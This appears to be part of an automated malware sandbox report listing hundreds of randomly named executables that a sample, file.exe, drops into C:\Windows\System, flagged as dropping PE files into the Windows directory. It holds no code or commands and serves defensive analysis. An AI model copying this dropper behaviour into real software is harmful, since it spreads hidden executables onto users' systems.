Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\yuTigyc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\dMXkTWG.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\cVpmxhg.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mByREeI.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rtBLYbw.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\EzVUaNc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\EZbURBQ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\geBTNDq.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\TVNHEGY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PjowoJp.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\bzSbRdi.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\FoekgWP.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sDLqeeh.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\bFsdWPU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WvkREuJ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\aBqatWR.exe	Jump to dropped file

Drops PE files to the windows directory (C:\Windows)

Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\kYjPKaN.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\RcAqfwv.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PaGFrFU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\OpMgkKg.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\MydOwjq.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HKdVaSy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\FgiIXgf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\NyhRMmW.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rgBmwKj.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\QdDnaqt.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\BpqsHCR.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\gKbbPbF.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\kFAVWnk.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\roZGxps.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\SAfbgcC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\XWzPvUm.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wkIkkhX.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\UQkDiSP.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\AQSffhY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uRBSbtU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\YYCxOQh.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rYIlnZs.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\XZxtJFw.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\dCnJkoQ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\BwBweqn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\pzbELEW.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\qdErmhf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rQJmlSe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\qQyXqOp.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fIqTNJz.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WlVmTit.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\xAzCYwU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\eXUokzg.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\IpqVIyY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\oUGjnOU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sabRErB.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\BwjWQVv.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\snZBbmy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\eVVPPqR.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\KEULPTl.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mgbtojr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\UmvuxvA.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\Uvtpjkd.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\NLJeLdM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ORmCcsC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\xneUGSK.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\KVgdAzq.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\jYFqRXp.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\XAgYYqB.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WTLAzgJ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\whRtinB.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wHnuprt.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mXElbHo.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VgNRTsd.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\DbVBXPi.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uaJCfvY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\jAqlPqL.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\JKpmIVS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wibjUVa.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\oxCQuSo.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\GmNUXAr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\IofoOIp.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\CWLRJYu.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HnTfvAZ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\delwiax.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\EkcZQPq.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fylerHE.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VFkciqc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fpHmIIc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\vUKZkjM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\yXkrKHV.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VwIvzCk.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VdwdSnC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fyffsXe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\TscCBWf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\iHSYLud.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wJZTVhW.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\gCZFmUf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\JUxucoT.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\YFzrUDj.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\bpCJdvZ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VGaSwYr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\UlGsoAn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uSdaSKW.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\YHgRCCe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\YnfMwga.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\UExJWUr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PLFTiIe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\EMuPVcI.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\xIpouRJ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wpjxcMS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\LOvnxUx.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wCJLXKb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sXBohAC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ABievJY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PrFZfUv.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\MKAkyBP.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mKdsHiQ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\BNgUfBr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WLWcTVM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ukkpYme.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\hEUEsIC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mWAGJFM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\cLSDHvv.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\Csmwgyb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uHZGZjz.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\jzfTIlb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sOpjlAo.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fWWVlTg.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PZXDYlu.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\DTREvJC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HeXCeXe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\BtXtEfY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sOGcIfs.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\SNcreuq.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\tRGqWXW.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\iIwdGAS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\RlLCkUy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\caYiRYR.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\otCfESI.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\MLxwqET.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\xNhRSWh.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ZTSJHKb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\YUQTINM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fEOJwwW.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ppfNNTX.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PABSWXd.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\MCvhdFU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fYMwhpS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ASKjfZy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PUqZmPS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\NzANgdB.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\hhEeZzN.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\hAOVVjq.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\vREuzRr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\eLYbCEG.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\MgoHIfZ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sFwDWFc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\jqUGnrw.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\usscfzm.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rXBWFEL.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wJNkgSa.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ZDeifCM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mEVTdIJ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\XqXHiyf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ajEytdP.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PRQFErV.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\blOLvcj.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\JGfFPYZ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mZnsuql.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\DrKJjXc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\JRnaUrS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\IBWzTMA.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\iSmvfWm.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\bJVoOik.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VExclqz.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mtnXczE.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uwKMlqy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\gQbnwXn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\tXVZMjj.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\SYLAfii.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uBSPQKP.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wWwDsEl.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\brplcms.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\tyQdqmC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\zJwJxgA.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\RKUSbZV.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\jkErNHB.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rwUXwnj.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\gAPrxpM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\GaSDvNs.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\zYyqoWF.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\iJpJhmt.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PdxLXDE.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\LYzOvkf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uNQcZEb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ERbKWDm.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\zzbooXY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\QWtCxan.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ltlcnHD.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\tzOEnrH.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\FaabrKu.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\SOFlTuM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\RtRmRJz.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\SxjZpBy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\LPMtFlZ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\pPLiGBV.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\dmPtXnK.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\QZBRXHU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ssUJwoR.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ndpwHPZ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\lQcYvMS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VPuwqFY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ihDRfqA.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sctmwAr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uJEYoyF.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\defQfgC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\XJEUdeq.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rKZvlov.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VWrcuzM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\KVTiBjz.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sPniyBl.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wsmNUVo.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\lrIaMFU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\LKurWpq.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HUohYxb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\MwFvbxc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\StIsyPE.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WOvgLKK.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\xsirwHn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ffPPQcz.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\cVJdttA.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VLekFWd.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\CpMhLMx.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\FGUHzJz.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\NuxBytj.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\gXwIlxx.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HNocQDn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ftWkAMN.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\nJFWveO.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rfpCYxf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\xZqqKxJ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\UiAsnNy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HEPcUok.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fXSZuyj.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ArNQyZf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\hAjIjRa.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rDRaLhy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\UyqOZIb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rTrjeti.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\AONeoTK.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\RgcKJVt.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\gPTriDK.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\bymvMyH.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\XBXKJRi.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\osHoaGO.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\eQlnkhq.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\LNyWtrn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ZlvPlxy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\xVIixqx.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\JCZRmvQ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sHbEZkY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rVmcjTa.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\aIuDozC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\DtVOaSb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\RCVCpIi.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\vyHGCnK.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\IEswIyo.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\IjDqKMU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\iEDLgeS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\qmcblFN.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ZCyEzte.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ztQluWW.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\vixYnHG.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PPOtBBY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ZohDODH.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\tyXEsEa.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\FUwHkXo.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\AbenojY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mlhNNPN.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\pMaKiZu.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\BMxbfij.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\OVdNTki.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\NVxCwjX.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\FHjAcHx.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\glgdLrR.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\jtnQpnb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\pbwrbNh.exe	Jump to dropped file
